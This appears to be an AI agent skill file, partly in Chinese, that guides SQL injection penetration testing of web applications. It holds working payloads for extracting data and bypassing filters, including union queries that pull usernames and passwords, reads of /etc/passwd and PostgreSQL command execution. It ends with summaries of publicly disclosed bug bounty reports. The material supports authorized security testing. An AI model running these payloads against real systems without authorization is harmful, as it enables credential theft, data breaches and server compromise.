| name | pentest-sqli |
| description | Use when performing penetration testing targeting SQL injection vulnerabilities in web applications. Keywords: SQL injection, blind SQLi, union-based, error-based, time-based, second-order injection, ORM injection, parameterized queries bypass |
SQL Injection Penetration Testing Patterns
当对 Web 应用进行 SQL 注入渗透测试时加载此 Skill。覆盖经典 SQLi、盲注、ORM 注入等攻击手法。
Attack Surface Discovery
高风险端点特征:
- 搜索/过滤功能:
?search=, ?filter=, ?sort=, ?order= 参数
- URL 路径中的 ID/标识符:
/user/123, /item/abc
- 登录/认证表单:用户名、密码字段
- API 端点:REST 查询参数、GraphQL 变量
- 后台管理面板:报表查询、数据导出功能
识别信号:
- 数据库错误信息泄露(MySQL:
You have an error in your SQL syntax, PostgreSQL: ERROR: syntax error at or near)
- 参数添加单引号
' 后响应异常(500 错误、空白页、内容变化)
- 数字参数可进行算术运算(
id=2-1 等价于 id=1)
- ORM 框架特征(Django QuerySet、Rails ActiveRecord、SQLAlchemy)
Exploitation Techniques
手动测试方法:
- 探测注入点:在每个参数后添加
'、"'、') 观察响应差异
- 确认注入:使用布尔条件
' AND '1'='1 vs ' AND '1'='2 对比响应
- 判断注入类型:
- Error-based:错误信息中直接回显数据
- Union-based:
' UNION SELECT NULL,NULL-- 逐步确定列数
- Boolean-blind:响应内容因条件真假而不同
- Time-blind:
'; WAITFOR DELAY '0:0:5'--(MSSQL)或 ' AND SLEEP(5)--(MySQL)
Payload 构造:
# Union-based(先确定列数)
' ORDER BY 1--
' ORDER BY 2--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
# Error-based(MySQL)
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
# Time-blind
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
# Boolean-blind
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
Bypass 技巧:
- WAF 绕过:
/*!50000UNION*/、uNiOn SeLeCt、内联注释 /**/
- 编码绕过:URL 双重编码
%2527、Unicode 编码
- 空格替代:
/**/、%09、%0a、+
- 关键字拆分:
SEL/**/ECT、UN/**/ION
Second-order SQLi(二次注入):
- 第一步:在注册/Profile 更新等写入操作中存入恶意 payload(如用户名
admin'--)
- 第二步:当应用在后续查询中使用已存储的数据(未重新转义)时触发注入
- 常见场景:注册用户名 → 密码修改时使用该用户名构造 SQL
ORM 特定注入:
- Django Q 对象
_connector 注入:通过操纵 Q 对象的连接器注入任意 SQL
- Django
FilteredRelation:测试条件构造中的注入点
- SQLAlchemy
text() 拼接:检查原始 SQL 片段是否含用户输入
- Rails ActiveRecord:
.where("name = '#{params[:name]}'")、.order(params[:sort]) 未参数化
- Hibernate HQL:
createQuery("FROM User WHERE name = '" + input + "'") 拼接
- Sequelize:
.literal() 和 $raw 查询中的未转义输入
PostgreSQL 特定 Payload:
# Error-based
' AND 1=CAST((SELECT version()) AS int)--
# Time-blind
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
# 文件读取
' UNION SELECT pg_read_file('/etc/passwd',0,1000)--
# 命令执行(需 superuser)
'; COPY cmd_exec FROM PROGRAM 'id';--
Detection Checklist
Impact Assessment
漏洞利用可达到的效果:
- 数据泄露:读取整个数据库(用户凭证、PII、业务数据)
- 认证绕过:
' OR '1'='1 绕过登录验证
- 数据篡改:INSERT/UPDATE/DELETE 操作修改数据
- 权限提升:通过数据库写入 webshell 或执行系统命令(
xp_cmdshell、LOAD_FILE/INTO OUTFILE)
- 横向移动:利用数据库连接信息访问其他内部服务
严重度判断:
- Critical:可提取敏感数据(凭证、PII)、可执行系统命令、无需认证即可利用
- High:需认证但可读取大量数据、盲注可确认敏感信息存在
- Medium:注入存在但提取数据受限(如仅 boolean-blind 且 WAF 限制严格)
Real-World Cases
以下案例来自 HackerOne 公开披露的真实漏洞报告,展示了该类漏洞在实际目标中的表现形式。
Case 1: Django — SQL Injection in Django ORM via Unvalidated _connector in Q Objects
- 严重度: Critical | CWE: SQL Injection
- 摘要: A critical SQL injection vulnerability was discovered in the Django ORM's handling of Q objects. The internal WhereNode.as_sql method used unsafe string formatting to inject the query connector, which...
- 报告: https://hackerone.com/reports/3335709
Case 2: Django — SQL Injection when using FilteredRelation
- 严重度: Critical | CWE: SQL Injection
- 摘要: A SQL injection vulnerability was discovered in the Django framework when using the FilteredRelation feature. The vulnerability was located in the tests/filtered_relation/tests.py file. The vulnerabil...
- 报告: https://hackerone.com/reports/3292573
Case 3: IBM — SQL Injection vulnerability found on ibm.com endpoint
- 严重度: Critical | CWE: SQL Injection
- 摘要: A SQL injection vulnerability was found on an ibm.com endpoint. The vulnerability was reported to IBM, analyzed, and remediated.
- 报告: https://hackerone.com/reports/3578842
Case 4: IBM — SQL injection identified on IBM endpoint.
- 严重度: Critical | CWE: SQL Injection
- 摘要: SQL injection vulnerability was identified on an IBM endpoint. The issue was reported to IBM, analyzed, and remediated.
- 报告: https://hackerone.com/reports/2830573
Case 5: MTN Group — SQLi | in URL paths
- 严重度: Critical | CWE: SQL Injection
- 摘要: The vulnerability summary is as follows:
A SQL injection vulnerability was discovered in the customerId parameter of the URL path. The vulnerability was demonstrated by adding a quote in the customer...
Case 6: MTN Group — SQL injection in URL path leads to Database Access
Case 7: Mars — SQLi At ███████ via theme_name
- 严重度: Critical | CWE: SQL Injection
- 摘要: A SQL injection vulnerability was discovered in a web application's theme selection endpoint through the "theme_name" parameter. Using SQLMap, the vulnerability was demonstrated to be exploitable thro...
- 报告: https://hackerone.com/reports/3293803
Case 8: Mars — SQLi at █████ parameter
- 严重度: Critical | CWE: SQL Injection
- 摘要: A SQL injection vulnerability was discovered in an items endpoint that accepted unauthenticated POST requests without CSRF validation. The vulnerability allowed execution of arbitrary SQL commands and...
- 报告: https://hackerone.com/reports/3277276
Case 9: Mars — Blind SQL Injection on █████ via URI Path
- 严重度: Critical | CWE: SQL Injection
- 摘要: The vulnerability involved a time-based SQL injection attack on the target system via the URI path. The attack capitalized on vulnerabilities in the application's interactions with the database, allow...
- 报告: https://hackerone.com/reports/2266081
Case 10: Mozilla — SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription
- 严重度: Critical | CWE: SQL Injection
- 摘要: A SQL injection vulnerability was found in the invite_code parameter on prod.oidc-proxy.prod.webservices.mozgcp.net during Mozilla social inscription. Adding quotes to the parameter revealed the issue...
- 报告: https://hackerone.com/reports/2209130